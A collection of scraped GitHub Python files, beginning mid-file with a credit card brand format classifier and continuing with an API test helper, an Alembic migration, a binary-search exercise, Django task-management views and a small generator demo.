len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^389[0-9]{11}$',n):\n return True\n return False\n\ndef is_instapayment(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 16 and length <= 19:\n if re.match('^(6360)\\d+$',n) or re.match('^63[7-9][0-9]{13}$',n):\n return True\n return False\n\ndef is_laser(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['6706','6709','6771']\n if length >= 16 and length <= 19:\n if ''.join(n[:4]) in form or re.match('^(6304|6706|6709|6771)[0-9]{12,15}$',n):\n return True\n return False\n\n\ndef is_bcmc(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['6703']\n if length >= 13 and length <= 19:\n if ''.join(n[:4]) in form:\n return True\n return False\n\ndef is_solo(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['6334','6767']\n if length >= 16 and length <= 19:\n if ''.join(n[:4]) in form or re.match('^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$',n):\n return True\n return False\n\ndef is_switch(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['633110','633312','633304','633303','633301','633300']\n if length >= 16 and length <= 19:\n if ''.join(n[:6]) in form or re.match('^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$',n):\n return True\n return False\n\ndef is_jcb(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length == 16:\n if ''.join(n[:4]) in strings_between(3528, 3589)or re.match('^(?:2131|1800|35\\d{3})\\d{11}$',n):\n return True\n return False\n\ndef is_unionpay(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 12 and length <= 19:\n if re.match('^(62|88)\\d+$',n) or re.match('^(62[0-9]{14,17})$',n):\n return True\n return False\n\ndef is_visa(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 16:\n if n[0] == '4':\n 
if(re.match('^4[0-9]{12}(?:[0-9]{3})?$',n)):\n return True\n return False\n\ndef is_dinersclub(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['30','36']\n if length >= 13 and length <= 19:\n if ''.join(n[:2]) in form or (re.match('^3(?:0[0-5]|[68][0-9])[0-9]{11}$',n)):\n return True\n return False\n\ndef is_cartebancaire(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['4035','4360']\n if length >= 13 and length <= 19:\n if ''.join(n[:4]) in form:\n return True\n return False\n\ndef is_vpay(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['4370','482']\n if length >= 13 and length <= 19:\n if ''.join(n[:4]) in form or ''.join(n[:3]) in form:\n return True\n return False\n\ndef is_visa_electron(n):\n \"\"\"Checks if credit card number fits the visa electron format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['026', '508', '844', '913', '917','405']\n\n if length == 16:\n if n[0] == '4':\n if ''.join(n[1:4]) in form or ''.join(n[1:6]) == '17500':\n return True\n return False\n\n\ndef is_mastercard(n):\n \"\"\"Checks if credit card number fits the mastercard format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 16 and length <= 19:\n if ''.join(n[:2]) in strings_between(50, 56) or (re.match('^5[1-5][0-9]{14}$',n)):\n return True\n return False\n\ndef is_rupay(n):\n \"\"\"Checks if credit card number fits the mastercard format.\"\"\"\n n, length = str(n), len(str(n))\n if length >= 13 and length <= 19:\n if ''.join(n[:6]) in strings_between(508500, 508999) or ''.join(n[:6]) in strings_between(606985, 607984) or ''.join(n[:6]) in strings_between(608001, 608500) or ''.join(n[:6]) in strings_between(652150, 653149):\n return True\n return False\n\n\ndef is_elo(n):\n \"\"\"Checks if credit card number fits the mastercard format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['5066']\n if length >= 16 and length <= 19:\n if ''.join(n[:4]) in form:\n return True\n return False\n\ndef is_amex(n):\n \"\"\"Checks if credit card number fits the american express format.\"\"\"\n n, length = str(n), len(str(n))\n if length == 15:\n if n[0] == '3' and (n[1] == '4' or n[1] == '7'):\n if(re.match('^3[47][0-9]{13}$',n)):\n return True\n else:\n return False\n return False\n\n\ndef is_maestro(n):\n \"\"\"Checks if credit card number fits the maestro format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['5018', '5020', '5038', '5893', '6304',\n '6759', '6761', '6762', '6763','6731',\n '06','6779','677','678','679']\n\n if length >= 12 and length <= 19:\n if ''.join(n[:4]) in form:\n return True\n elif ''.join(n[:3]) in form:\n return True;\n elif ''.join(n[:2]) in form:\n return True;\n return False\n\n\ndef is_discover(n):\n \"\"\"Checks if credit card number fits the discover card format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length == 16:\n if n[0] == '6':\n if ''.join(n[1:4]) == '011' or n[1] == '5':\n return True\n elif n[1] == '4' and n[2] in strings_between(4, 10):\n return True\n elif ''.join(n[1:6]) in strings_between(22126, 22926):\n return True\n return False\n\n\ndef get_format(n):\n \"\"\"Gets a list of the formats a credit card number fits.\"\"\"\n formats = []\n\n if is_visa(n):\n formats.append('visa')\n if is_visa_electron(n):\n formats.append('visa electron')\n if is_mastercard(n):\n formats.append('mastercard')\n if is_amex(n):\n formats.append('amex')\n if 
is_maestro(n):\n formats.append('maestro')\n if is_discover(n):\n formats.append('discover')\n if is_rupay(n):\n formats.append('rupay')\n if is_hipercard(n):\n formats.append('hipercard')\n if is_dankort(n):\n formats.append('dankort')\n if is_instapayment(n):\n formats.append('instapayment')\n if is_laser(n):\n formats.append('laser')\n if is_bcmc(n):\n formats.append('bcmc')\n if is_jcb(n):\n formats.append('jcb')\n if is_unionpay(n):\n formats.append('unionpay')\n if is_solo(n):\n formats.append('solo')\n if is_dinersclub(n):\n formats.append('dinersclub')\n if is_cartebancaire(n):\n formats.append('cartebancaire')\n if is_elo(n):\n formats.append('elo')\n if is_vpay(n):\n formats.append('vpay')\n if is_switch(n):\n formats.append('switch')\n if is_carteblanche(n):\n formats.append('carteblanche')\n if is_bcglobal(n):\n formats.append('bcglobal')\n if is_koreancard(n):\n formats.append('koreancard')\n return formats\n\n\ndef strings_between(a, b):\n \"\"\"Generates a list of strings between a and b.\"\"\"\n return list(map(str, range(a, b)))\n","repo_name":"chetan92/CardValidator","sub_path":"CardValidator-master/cardvalidator/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":8817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
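# The formatter above classifies numbers by brand prefix only; nothing checks the
# digits themselves. A Luhn (mod-10) checksum is the standard companion test -- this
# sketch is an addition for illustration, not part of the CardValidator record:
def luhn_valid(n):
    digits = [int(d) for d in str(n)]
    # Double every second digit from the right, folding two-digit results (x*2 - 9).
    for i in range(len(digits) - 2, -1, -2):
        doubled = digits[i] * 2
        digits[i] = doubled - 9 if doubled > 9 else doubled
    return sum(digits) % 10 == 0

assert luhn_valid('4111111111111111')       # well-known Visa test number
assert not luhn_valid('4111111111111112')   # corrupt check digit fails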
+{"seq_id":"9931105230","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/3/9 11:54\n# @Author : 潘师傅\n# @File : XfpApi.py\nimport requests\nimport json\nfrom GlobalMap import GlobalMap\nfrom Config.Config import *\nimport unittest\nimport time\nimport random\nimport datetime\nimport calendar\n\n\nclass appletApi:\n\n def __init__(self):\n self.appletText = GlobalMap()\n\n def RandomText(self, textArr):\n \"\"\"指定字符串随机取值\"\"\"\n # ['你好啊','阿米里!','扣你七娃','你好','hello']\n length = len(textArr)\n if length < 1:\n return ''\n if length == 1:\n return str(textArr[0])\n randomNumber = random.randint(0, length - 1)\n return str(textArr[randomNumber])\n\n def Merge(self, dict1, dict2):\n return (dict2.update(dict1))\n\n def PostRequest(self, url, data, header=None, Status=1, files=None, saasCode=XfpsaasCode):\n \"\"\"post请求\"\"\"\n if header is not None:\n r = requests.post(url=(ApiXfpUrl + url),\n data=json.dumps(data, ensure_ascii=False),\n headers={\n 'Content-Type': 'application/json'\n\n })\n else:\n data1 = {\"page\": {\n 'size': '100',\n 'current': '1'\n },\n \"saasCode\": saasCode,\n \"saasCodeSys\": saasCode\n }\n self.Merge(data1, data)\n time.sleep(0.2)\n r = requests.post(url=(ApiXfpUrl + url),\n data=(json.dumps(data,\n ensure_ascii=False).encode(\"UTF-8\")),\n headers={\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer' + ' ' + self.appletText.get(\"user_token\")\n },\n files=files)\n r.raise_for_status()\n self.appletText.set_map('URL', ApiXfpUrl + url)\n globals()['XfpText'] = globals()['r.text'] = json.loads(r.text)\n self.appletText.set_map('XfpText', globals()['r.text'])\n self.appletText.set_map('ApiXfpUrl', url)\n self.appletText.set_map('msg', globals()['XfpText']['msg'])\n self.appletText.set_map('code', globals()['XfpText']['code'])\n self.appletText.set_map('data', globals()['XfpText']['data'])\n time.sleep(0.2)\n if Status == 1:\n try:\n assert \"成功\", globals()['r.text']['msg']\n except BaseException as e:\n print(\"断言错误,错误原因:%s\" % e)\n raise RuntimeError(self.appletText.get('URL'))\n if globals()['r.text']['code'] == 500:\n raise RuntimeError(self.appletText.get('ApiXfpUrl'))\n\n if r.elapsed.total_seconds() > 5:\n print('接口请求过慢')\n print(self.appletText.get('ApiXfpUrl'))\n if r.elapsed.total_seconds() > 10:\n print('接口请求过慢大于10秒')\n print(self.appletText.get('ApiXfpUrl'))\n\n def sendCodeWeiXin(self, userName='19859080323'):\n \"\"\"获取验证码\"\"\"\n self.PostRequest(url='/api/auth/sendCodeWeiXin',\n data={\n 'senderSource': '微信小程序',\n 'senderDevice': 'ces',\n 'userName': userName\n })\n\n def Login(self, userName=XfpUser, code='12345678'):\n \"\"\"登录\"\"\"\n self.PostRequest(url='/api/auth/loginByCodeWeiXin',\n data={\n \"senderSource\": \"微信小程序\",\n # \"senderDevice\": \"ces\",\n \"userName\": userName,\n \"code\": code})\n if self.appletText.get('msg') == '成功':\n if (globals()['XfpText']['data']['userDetail']) is not 'None':\n self.appletText.set_map('user_token', globals()['XfpText']['data']['token'])\n\n def LogIn(self, userName=XfpUser, password=XfpPwd, saasCode=XfpsaasCode, authCode=None, device=None):\n \"\"\"登录\"\"\"\n if device is None:\n device = deviceId\n if authCode is None:\n self.PostRequest(url='/api/auth/login',\n data={\"userName\": userName,\n 'saasCode': saasCode,\n 'deviceId': device,\n # 'deviceId': deviceId,\n \"password\": password},\n header=1)\n else:\n self.PostRequest(url='/api/auth/login',\n data={\"userName\": userName,\n 'saasCode': saasCode,\n 'authCode': authCode,\n \"password\": password},\n header=1)\n\n if 
self.appletText.get('msg') == '成功':\n if (globals()['XfpText']['data']['userDetail']) is not 'None':\n if authCode is None:\n self.appletText.set_map('user_token', globals()['XfpText']['data']['token'])\n\n else:\n self.appletText.set_map('user_token', globals()['XfpText']['data']['token'])\n try:\n self.appletText.set_map('resultStr', globals()['r.text']['data']['resultStr'])\n except:\n pass\n\n else:\n self.appletText.set_map('userId', globals()['XfpText']['data']['userDetail']['id'])\n\n else:\n self.appletText.set_map('data', globals()['XfpText']['data'])\n\n\nif __name__ == '__main__':\n a = appletApi()\n\n\n","repo_name":"yebenxiaozhang/Projects_xfj","sub_path":"XFP/PubilcAPI/appletApi.py","file_name":"appletApi.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
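# Worth spelling out the fix applied above: the original `x is not 'None'` tested
# identity against the *string* 'None', which is always true for parsed JSON -- a
# missing value comes back as the None object. A minimal demo of the corrected check:
import json

payload = json.loads('{"data": {"userDetail": null}}')
detail = payload['data']['userDetail']
print(detail is not None)    # False: JSON null parses to the None object
print(detail != 'None')      # True: a string comparison never catches it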
+{"seq_id":"24481982341","text":"\"\"\"empty message\n\nRevision ID: 102d609bce75\nRevises: 12c9567eaed5\nCreate Date: 2015-01-25 22:28:39.076329\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '102d609bce75'\ndown_revision = '12c9567eaed5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('wufoo_textarea_sentiment', sa.Column('survey_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'wufoo_textarea_sentiment', 'wufoo_survey', ['survey_id'], ['id'])\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'wufoo_textarea_sentiment', type_='foreignkey')\n op.drop_column('wufoo_textarea_sentiment', 'survey_id')\n ### end Alembic commands ###\n","repo_name":"wigginslab/lean-workbench","sub_path":"migrations/versions/102d609bce75_.py","file_name":"102d609bce75_.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"}
+{"seq_id":"9878348943","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\ntrees = list(map(int, sys.stdin.readline().split()))\n\nstart, end = 1, max(trees)\n\ndef get_woods(meter):\n woods = 0\n for tree in trees:\n woods += tree - meter if tree > meter else 0\n return woods\n\nwhile start <= end:\n mid = (start + end) // 2\n woods = get_woods(mid)\n \n if woods >= m:\n start = mid + 1\n else:\n end = mid - 1\n\nprint(end)","repo_name":"mchu7797/coding-tests-algorithm","sub_path":"2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24453659340","text":"import json\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib import messages\nfrom django.http import JsonResponse\nfrom datetime import datetime\nfrom .models import Task, Assignment\nfrom .forms import Task_creation_form\nfrom company.models import Company,Notification\n\n\n@login_required(login_url='account:login')\ndef get_task_info_based_on_status(request, status):\n user = request.user\n status = status\n task_query = Task.objects.filter(assignee=user, status=status)\n\n task_list = []\n for t in task_query:\n task = {\n 'finishing_expected': t.finishing_expected.strftime(\"%b %d, %Y, %I:%M %p\"),\n 'title':t.title,\n 'task_id':t.id,\n 'priority':t.priority,\n 'company':t.company.name,\n 'company_id':t.company.id\n }\n task_list.append(task)\n\n return JsonResponse({'data':task_list}, safe=False)\n\n\n@login_required(login_url='account:login')\ndef get_task_info_for_task_modal(request, id):\n task = Task.objects.get(pk=id)\n\n assignee_list = []\n for a in task.assignee.all():\n assignee = {\n 'assignee_id':a.id,\n 'assignee_name':a.username,\n 'assignee_img_url':a.profile_picture.url,\n }\n assignee_list.append(assignee)\n\n if task.finishing_date:\n finishing_date = task.finishing_date.strftime(\"%b %d, %Y, %I:%M %p\"),\n else:\n finishing_date = None,\n\n data = [{\n 'title':task.title,\n 'status':task.status,\n 'drescription':task.drescription,\n 'priority':task.priority,\n 'checklist':task.checklist,\n 'company':task.company.name,\n 'company_id':task.company.id,\n 'company_logo_url':task.company.company_logo.url,\n 'assignees':assignee_list,\n 'finishing_expected':task.finishing_expected.strftime(\"%b %d, %Y, %I:%M %p\"),\n 'date_created':task.date_created.strftime(\"%b %d, %Y, %I:%M %p\"),\n 'finishing_date':finishing_date,\n },]\n return JsonResponse({'data':data}, safe=False )\n\n# cancelling their implementation to shortend dev time,\n# use if to check null or not, then use below code, or response won't be ok\n# 'last_updated':task.last_updated.strftime(\"%b %d, %Y, %I:%M %p\"),\n# 'finishing_date':task.finishing_date.strftime(\"%b %d, %Y, %I:%M %p\"),\n\ndef user_workspace(request):\n tasks = Task.objects.filter(assignee=request.user, status='ongoing')\n context = {\n 'tasks':tasks,\n }\n return render(request, 'task/user-workspace.html', context)\n\n\n@login_required(login_url='account:login')\ndef show_company_list(request):\n user = request.user\n companies = Company.objects.filter(members=user)\n users_companies = Company.objects.filter(creator=user)\n\n context = {\n 'companies':companies,\n 'user_companies':users_companies,\n }\n return render(request, 'task/show-company-list.html', context)\n\n\n@login_required(login_url='account:login')\ndef create_task(request, c_id):\n company_id = c_id\n form = Task_creation_form(user_id=request.user.id, company_id=company_id)\n\n if request.method == 'POST':\n form = Task_creation_form(user_id=request.user.id,company_id=company_id,data=request.POST)\n if form.is_valid():\n task = form.save(commit=False)\n task.creator = request.user\n\n if task.status == 'finished':\n task.finishing_date = datetime.today()\n\n task.save()\n\n company = form.cleaned_data['company']\n for user in form.cleaned_data['assignee']:\n Assignment.objects.create(user=user, task=task)\n title = 'Task Assignment'\n subject = f\"{company.name} assigned you new Task.\"\n notification = 
Notification.objects.create(\n type = \"assignment\",\n title = title,\n subject = subject,\n company_sender = company,\n )\n notification.receivers.set([user])\n\n messages.success(request, 'Task Created Successfully')\n return redirect('task:user-workspace')\n\n context = {\n 'form':form\n }\n return render(request, 'task/create-task-form.html', context)\n\n\n@login_required(login_url='account:login')\ndef edit_task(request, id):\n task = Task.objects.get(pk=id)\n user_id = request.user.id\n company_id =task.company.id\n form = Task_creation_form(user_id=user_id,company_id=company_id,instance=task)\n\n if request.method == \"POST\":\n form = Task_creation_form(user_id=user_id,company_id=company_id,data=request.POST, instance=task)\n\n if form.is_valid():\n task = form.save(commit=False)\n\n if task.status == 'finished':\n task.finishing_date = datetime.today()\n\n task.save()\n company = form.cleaned_data['company']\n for user in form.cleaned_data['assignee']:\n try:\n assignment = Assignment.objects.get(user=user, task=task)\n except:\n assignment = None\n\n if assignment is None:\n Assignment.objects.create(user=user, task=task)\n title = 'Task Assignment'\n subject = f\"{company.name} assigned you new Task.\"\n notification = Notification.objects.create(\n type = \"assignment\",\n title = title,\n subject = subject,\n company_sender = company,\n )\n notification.receivers.set([user])\n\n messages.success(request, 'Task Updated')\n return redirect('task:user-workspace')\n\n context = {\n 'form':form,\n }\n return render(request, 'task/create-task-form.html', context)\n\n\n@login_required(login_url='account:login')\ndef delete_task(request, id):\n task = Task.objects.get(pk=id)\n\n context = {\n 'task':task,\n }\n return render(request, 'task/delete-task.html', context)\n\n@login_required(login_url='account:login')\ndef confirm_delete_task(request, id):\n task= Task.objects.get(pk=id)\n task.delete()\n messages.warning(request, 'Task deleted')\n return redirect(request.GET['next'] if 'next' in request.GET else 'task:user-workspace')\n\n\n","repo_name":"Yasir-GitAc/task-management","sub_path":"task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
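# The views above call Task.objects.get(pk=id) directly, so an unknown id raises
# Task.DoesNotExist and surfaces as a 500. A common Django alternative -- sketched
# here against the record's own Task model, not a change the author made -- returns
# a 404 instead:
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render
from .models import Task

@login_required(login_url='account:login')
def delete_task(request, id):
    task = get_object_or_404(Task, pk=id)   # 404 rather than an unhandled exception
    return render(request, 'task/delete-task.html', {'task': task})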
+{"seq_id":"32151320389","text":"def zakres(pierwszy=0, ostatni=100, krok=1):\n liczba = pierwszy\n while liczba < ostatni:\n yield liczba\n liczba += krok\n\nzakres1 = zakres(1,50)\n#zakres2 = zakres(1,50)\n\nfor a in zakres1:\n print(a)\n\nfor b in zakres1:\n print(b)","repo_name":"marcingastol/WSB_Python_2022-23_GR3","sub_path":"T3/Niedziela/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"pl","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}